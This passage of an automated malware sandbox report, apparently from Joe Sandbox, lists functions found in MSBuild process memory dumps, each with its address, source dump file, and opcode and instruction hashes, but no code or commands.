                                                                                                            • Instruction Fuzzy Hash: EF210175604300DFDB04DF94D9C4B26BBA5FB88314F20C9ADE94A4B2D6C336E846CA62
                                                                                                            Function 06697A40 Relevance: .1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35af2145ad5181cfb7374ab51b6ca2ebf95bcd82107780ecb689d8770edd9fff
                                                                                                            • Instruction ID: 7f5b92ee9124de6a6ff0ca3b13ef8afe18879cbab68933f30f02edb8280b453d
                                                                                                            • Opcode Fuzzy Hash: 35af2145ad5181cfb7374ab51b6ca2ebf95bcd82107780ecb689d8770edd9fff
                                                                                                            • Instruction Fuzzy Hash: 3921AF70D01358DBEB24DFA5C805BEEBBB5AF86300F20856AC8057B255DF745A46CFA1
                                                                                                            Function 0669DCA2 Relevance: .1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5382fdb5925f2a82b2d4cf1f58d0110ef915bfff7a5fa0260d870b1d690f874
                                                                                                            • Instruction ID: 4cdccf15b700702c3b64b0707df16adb83b900e5cf28b9042012a579293a9ee3
                                                                                                            • Opcode Fuzzy Hash: e5382fdb5925f2a82b2d4cf1f58d0110ef915bfff7a5fa0260d870b1d690f874
                                                                                                            • Instruction Fuzzy Hash: 5321D074E0060ADBCB44DFA9D585AAEFBB6FF49300F2082A5D519B7240D734AA81CF94
                                                                                                            Function 06694B50 Relevance: .1, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b855a9a8962eaebffe0fb1fea8502aff57428c85cedff2488d48ad42b2e1c14
                                                                                                            • Instruction ID: d620a3e2627d12c5bc3124827a51a23e82843f8b20dd8f9e0fb6a0e9896d00b5
                                                                                                            • Opcode Fuzzy Hash: 1b855a9a8962eaebffe0fb1fea8502aff57428c85cedff2488d48ad42b2e1c14
                                                                                                            • Instruction Fuzzy Hash: CE210E70E012189FCB48DFA9D8496EEBBF2FF89310F10802AD515B3390DB755A46CBA0
                                                                                                            Function 022BF0CA Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 174e53f72f4809f582618632e44bcbadc1c423207cf52282edba7a3369799a4e
                                                                                                            • Instruction ID: 31e988673d1b3612454972c7031ca78c0b2eb25f38e167ca8c23015c136d8bdb
                                                                                                            • Opcode Fuzzy Hash: 174e53f72f4809f582618632e44bcbadc1c423207cf52282edba7a3369799a4e
                                                                                                            • Instruction Fuzzy Hash: 0711D076F112098BCB14CFA998442EEBBF1EF89350F24C1AAE405A7358DA708C028B90
                                                                                                            Function 022BFE28 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ef48a6457e77f3bbfb146c887e412d544bfc073b6dc97927a426272b52d3fa90
                                                                                                            • Instruction ID: 13af55374f2a0ae11abf7a391e75840fe794ba9a851656eea20be0f19b97541f
                                                                                                            • Opcode Fuzzy Hash: ef48a6457e77f3bbfb146c887e412d544bfc073b6dc97927a426272b52d3fa90
                                                                                                            • Instruction Fuzzy Hash: 9111B4356047518FD721DF28D890A8B7FE1EF85205B00866AD4858F622EA30F90FC796
                                                                                                            Function 00BFD60F Relevance: .1, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524519582.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_bfd000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                                                                                            • Instruction ID: f95383926eb8c89199b5cbd50bfff3cdb0cbcb3e5a9d44b500363486530d3728
                                                                                                            • Opcode Fuzzy Hash: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                                                                                            • Instruction Fuzzy Hash: D121DF76504284DFCB06CF00D9C4B26BFB2FB88314F2486E9D9484B256C33AD82ACF91
                                                                                                            Function 0742F208 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 39b67fca8a2fcc5147ac80010e8638e40ee7cef623feea0730c9943176a4bc1c
                                                                                                            • Instruction ID: f5aa2983a5b2cf3f107f1d31cbefd2f4d14fd8892428931906c97edbe8f90f41
                                                                                                            • Opcode Fuzzy Hash: 39b67fca8a2fcc5147ac80010e8638e40ee7cef623feea0730c9943176a4bc1c
                                                                                                            • Instruction Fuzzy Hash: 49113AB5E0025A9FCB04DFA8D850AEEBBF1EF89300F1045AAD451B7391CB306E05CBA1
                                                                                                            Function 0669EDA9 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 43dbc712b744dd210d9af41b87bec34fb2e644a1f4fa2966e5b3f92cfcf946d6
                                                                                                            • Instruction ID: 7d431519275cb3ce5fa3d98482f76e2ce67f1e27b417fbd8d8a55bfc5101cfbd
                                                                                                            • Opcode Fuzzy Hash: 43dbc712b744dd210d9af41b87bec34fb2e644a1f4fa2966e5b3f92cfcf946d6
                                                                                                            • Instruction Fuzzy Hash: 7D01D6327041505FDB94E629EC4096A7FAEDFC9620B04407AE909C7361DD669C07C7B4
                                                                                                            Function 022BAF08 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9739acc21451aa713e1f9b473b1e7641041784d06bb33cd2d9bece834a41a0cf
                                                                                                            • Instruction ID: e3beea7e2dc81c5cab5b9705d3da2f800573078285d8820049855629d47cf1bb
                                                                                                            • Opcode Fuzzy Hash: 9739acc21451aa713e1f9b473b1e7641041784d06bb33cd2d9bece834a41a0cf
                                                                                                            • Instruction Fuzzy Hash: 9D111F75E142098BCB04DFA8C8889EDFBB2BF8A305F149115D019BB359CB359C42CB54
                                                                                                            Function 00BFD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524519582.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_bfd000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                            • Instruction ID: b540382ad354ecb210025fd7bfbb086102a4c662b198f9d0070ac7bb1e0a71cb
                                                                                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                            • Instruction Fuzzy Hash: ED11E676504244CFCB15CF14D5C4B26BFB2FBA4324F24C6E9D9090B256C33AD85ACBA2
                                                                                                            Function 0669F028 Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac121eb1742ac3e49b3c8f78fe7417ff3c05b7e0d85e08906c698ab923d42791
                                                                                                            • Instruction ID: d1526311b40b4e2d05be59e821c1c19208878b59839cee52ca03bb89edf0400a
                                                                                                            • Opcode Fuzzy Hash: ac121eb1742ac3e49b3c8f78fe7417ff3c05b7e0d85e08906c698ab923d42791
                                                                                                            • Instruction Fuzzy Hash: 2F11F2B6C002098FDB20CFAAD844B9EFBF8AF48310F11842ED919A7200C775A545CFA5
                                                                                                            Function 06697880 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bddb140fe319224a6221d3de91455e7dc0a08934589531a96041e5dd36e8d770
                                                                                                            • Instruction ID: 13eb059a8065ffb897d8d78ac237851a869d5c6633e0e059d0e6852a2be5bf6b
                                                                                                            • Opcode Fuzzy Hash: bddb140fe319224a6221d3de91455e7dc0a08934589531a96041e5dd36e8d770
                                                                                                            • Instruction Fuzzy Hash: A5211270D05209DFCB48DFB8C8546AEBFB2FF4A304F1080AAD415A3290DB394A81CF94
                                                                                                            Function 00C0D203 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                                                                                            • Instruction ID: f1761a2a52654f5d403f0841e411ffc7dd957789f2aa49fae0487983a478d860
                                                                                                            • Opcode Fuzzy Hash: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                                                                                            • Instruction Fuzzy Hash: 3B11BF76504284CFCB12DF54D5C4B15FB72FB84324F24C6AAD84A4B696C33AD94ACFA2
                                                                                                            Function 00C0D3B3 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                            • Instruction ID: a3dfe225095715bce4c5129f46b58c9b129c6f59fbce05e563f14bf89343481f
                                                                                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                            • Instruction Fuzzy Hash: 4C119D75504280DFCB05CF94D5C4B15FBA2FB84324F24C6AED84A4B696C33AE94ACF62
                                                                                                            Function 00C0D57B Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524635681.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_c0d000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                            • Instruction ID: 946a0c1cb85b8ed90907faceb82ad9d15bcf18d23324a64e31d63619ec0f72f6
                                                                                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                            • Instruction Fuzzy Hash: D411BB75504280CFCB05CF50D5C0B15BBA2FB84324F24CAAAE84E4B296C33BD84ACF61
                                                                                                            Function 0742F218 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c81048e7fcad435dfbfbf093e0df94bfe11de84c1132dce7f2ff8e9740138cd6
                                                                                                            • Instruction ID: c18a0093e031001db514b1021334de127c809a2117e1d63953edcaf7f3789897
                                                                                                            • Opcode Fuzzy Hash: c81048e7fcad435dfbfbf093e0df94bfe11de84c1132dce7f2ff8e9740138cd6
                                                                                                            • Instruction Fuzzy Hash: FF11E3B5E002199FCB04EFA8D854AEEB7B1EF89300F50416AD915B7390CB306E01CBA5
                                                                                                            Function 0669F030 Relevance: .1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 75254ef9cc6243da11f4f344d2dbe606686b8ee50067202a420ae120064d0afc
                                                                                                            • Instruction ID: eb520494923f042d182f7a67cad3c2c1bb30f00b3ee61bdd2bcc54f0cb23d05b
                                                                                                            • Opcode Fuzzy Hash: 75254ef9cc6243da11f4f344d2dbe606686b8ee50067202a420ae120064d0afc
                                                                                                            • Instruction Fuzzy Hash: 8F11E2B6C003098FDB20DF9AD844B9EFBF8AB48310F11842ED919A7200C775A545CFA5
                                                                                                            Function 0669FB76 Relevance: .1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 89ef0253417f8059119e26fbaa44871f83ea61bd8a5d2de413dffa25e99fc658
                                                                                                            • Instruction ID: 7886bba1ead998eafa4aa0fceedb18bf9efa2bee57c07c57210b5a620b31a16a
                                                                                                            • Opcode Fuzzy Hash: 89ef0253417f8059119e26fbaa44871f83ea61bd8a5d2de413dffa25e99fc658
                                                                                                            • Instruction Fuzzy Hash: 3C1126B5C083888FCB21DFA9D844BDABFF4AB49210F14849AD458E7251C279A945CFA1
                                                                                                            Function 066979A0 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ccea17abd02cf2d3d4926adc8042c6f92ae9d209758e25036c3ecec02c3a3c4
                                                                                                            • Instruction ID: 0f4353b64b94de57f9c9cbca8d73e018adcdfa885abd7f39acd85b012804f30a
                                                                                                            • Opcode Fuzzy Hash: 5ccea17abd02cf2d3d4926adc8042c6f92ae9d209758e25036c3ecec02c3a3c4
                                                                                                            • Instruction Fuzzy Hash: B611F274D00609AFCB40EFBCC589A9EBFB5BF45304F158694D414E7285D734EA80CBA9
                                                                                                            Function 06697890 Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c5617208b7ef21bd4f5441ff97dc375f2a9df833712e4ef72b2723c3e993bb0a
                                                                                                            • Instruction ID: 5c091e7217d396b69cca55293bc1fc365794e9f3cf7c449a0cb0d3e440f085b9
                                                                                                            • Opcode Fuzzy Hash: c5617208b7ef21bd4f5441ff97dc375f2a9df833712e4ef72b2723c3e993bb0a
                                                                                                            • Instruction Fuzzy Hash: B911B0B0D01219DFCB48DFA9D4556AEBBB2FF49301F10846AD415B3290DB395A81CF94
                                                                                                            Function 022BFE58 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3a6f433da58668a93425478f10e4e903ce1528ad0f9a6d6b4bd0069270ac966
                                                                                                            • Instruction ID: 777eb96072e548b69366fe0213fd133a443265bdf500921c01eff44475dc9454
                                                                                                            • Opcode Fuzzy Hash: a3a6f433da58668a93425478f10e4e903ce1528ad0f9a6d6b4bd0069270ac966
                                                                                                            • Instruction Fuzzy Hash: 0C0144356007058FD724DF29E84098BBBE5FF85255B008B29E44A8B725EB70FD0A8BD1
                                                                                                            Function 066955C7 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d0379a0f4979def3c2c8552816509e822424809168e6c2e35fb8156a6da73aca
                                                                                                            • Instruction ID: e413e2cbfe98ead496cbb0a1edc172f83a9ef7f73723a83c039552a5a6fce3a7
                                                                                                            • Opcode Fuzzy Hash: d0379a0f4979def3c2c8552816509e822424809168e6c2e35fb8156a6da73aca
                                                                                                            • Instruction Fuzzy Hash: 3D118D78E012288FCBA1DF29D980BDDB7B1AB49300F1051EAE90DB7214D6306E81CF90
                                                                                                            Function 066955D0 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8c64ab87982cb2da0bd4c4f631d5fbf4a65e662b98931634766f06c2c2edb150
                                                                                                            • Instruction ID: 291a5cc59bf8b50bee6b6b76255dc967cbc96f4f61c21cc8555c3fc2ae24e1d3
                                                                                                            • Opcode Fuzzy Hash: 8c64ab87982cb2da0bd4c4f631d5fbf4a65e662b98931634766f06c2c2edb150
                                                                                                            • Instruction Fuzzy Hash: AA115078E112298FCBA1DF25D980BDDB7B1AB89300F1051EAE90DBB214D6306E85CF51
                                                                                                            Function 00BFD9ED Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2524519582.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_bfd000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5f813a1d416876d69fc5d4c07df7129845853d194cc0fe5290ea669fe9e32f80
                                                                                                            • Instruction ID: caa0055306f6f29bcab73a6c184faf3816f85b3b3b54ab1c1b1d18be72729832
                                                                                                            • Opcode Fuzzy Hash: 5f813a1d416876d69fc5d4c07df7129845853d194cc0fe5290ea669fe9e32f80
                                                                                                            • Instruction Fuzzy Hash: B601D43140C3489AE7204A15CCC4776BBD9DF41321F14C499EF190B182C2359848CA7A
                                                                                                            Function 0669C789 Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8faa54587a49e48138b6d60808fc18bcddb351c677525ced2684af3d4c415602
                                                                                                            • Instruction ID: b8331a248d789ed92e71628666ea2ad8ccb0e5622da8b81f5da98268304c3691
                                                                                                            • Opcode Fuzzy Hash: 8faa54587a49e48138b6d60808fc18bcddb351c677525ced2684af3d4c415602
                                                                                                            • Instruction Fuzzy Hash: E5111BB4D04209DFDB44DFB5D8457AEBBF2EF89300F1080AAD915A7290DB710A40CF91
                                                                                                            Function 0669FB88 Relevance: .0, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee7da902e8c91362a553d6a6c07ddc56415c0474e519e58ddaa7b2f4f9429887
                                                                                                            • Instruction ID: 236eb3212f65ad9d213a39b592f9ccfdc3356529bef7ce9e14444aa8a9201f7a
                                                                                                            • Opcode Fuzzy Hash: ee7da902e8c91362a553d6a6c07ddc56415c0474e519e58ddaa7b2f4f9429887
                                                                                                            • Instruction Fuzzy Hash: 181100B5C003498FCB20DF9AD485B9EFBF8EB48320F20841AD958A7340C779A945CFA5
                                                                                                            Function 022BEDF0 Relevance: .0, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb14264c241c89d8a6a703ca635bf13b0042ff8944041cdc915b5dd209b590e6
                                                                                                            • Instruction ID: e55a06addaa18bd7500ead9d1679b2cd94cdb93910c433cd32b8571a87c08ea3
                                                                                                            • Opcode Fuzzy Hash: eb14264c241c89d8a6a703ca635bf13b0042ff8944041cdc915b5dd209b590e6
                                                                                                            • Instruction Fuzzy Hash: BA012C74D0024EDFDF19DFAAD9547EEBBF1AF85305F108029EA14A3254DB741A06CB81
                                                                                                            Function 066955C5 Relevance: .0, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4e4b8ba1a36851f989a715ce4d447703fcd49fe5410d913afa7a8b3e09f72c1
                                                                                                            • Instruction ID: 79d09be10d05601f4e77c40664dba42e7eac70624779b45294c5374cb3fd99c4
                                                                                                            • Opcode Fuzzy Hash: a4e4b8ba1a36851f989a715ce4d447703fcd49fe5410d913afa7a8b3e09f72c1
                                                                                                            • Instruction Fuzzy Hash: 24116F78A012288FCBA1DF29D980BDDB7B1AB49300F1051EAE90DB7214D6306E81CF90
                                                                                                            Function 0742EFDE Relevance: .0, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d3758a8172235bac3d48b345cc199ecfb39ae1f665baae88d0eaca3300acf9e
                                                                                                            • Instruction ID: 996685d97ebde4b88a7b965604067905d1d8c3438f5ba48aefcb6a89c75bae61
                                                                                                            • Opcode Fuzzy Hash: 3d3758a8172235bac3d48b345cc199ecfb39ae1f665baae88d0eaca3300acf9e
                                                                                                            • Instruction Fuzzy Hash: 0C11AEB4D01228CFEB20DF64C958BEEBBB1FB49301F5051AAD849A3250C7701EA6CF55
                                                                                                            Function 06696C48 Relevance: .0, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
